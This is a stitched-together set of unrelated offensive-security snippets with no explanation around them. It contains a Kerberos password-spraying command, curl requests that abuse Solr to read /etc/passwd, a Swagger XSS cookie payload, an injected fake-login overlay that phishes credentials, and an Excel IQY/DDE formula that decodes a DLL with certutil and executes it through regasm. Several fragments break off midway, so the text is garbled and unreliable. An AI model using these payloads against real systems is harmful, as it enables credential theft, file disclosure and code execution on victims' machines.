With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# ip="192.168.1.12:8983"
# curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json'
# curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
swagger: "2.0"
info:
  title: "Swagger Test Poc XSS"
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact:
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
{
  "flags": "-HanrPz",
  "pattern": "('|\")SELECT[\\S+\\n\\r\\s]+FROM[\\S+\\n\\r\\s]+('|\").*(\\.|\\{).*[\\S+\\n\\r\\s]+;"
}
var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
</div>
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
<p>An error occurred. Please login again.</p>
<form id=\"phishingForm\">
<p>Username <input type=\"text\" name=\"username\"></p>
<p>Password <input type=\"password\" name=\"password\"></p>
<p><input type=\"submit\" value=\"Login\"></p>
</form>
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None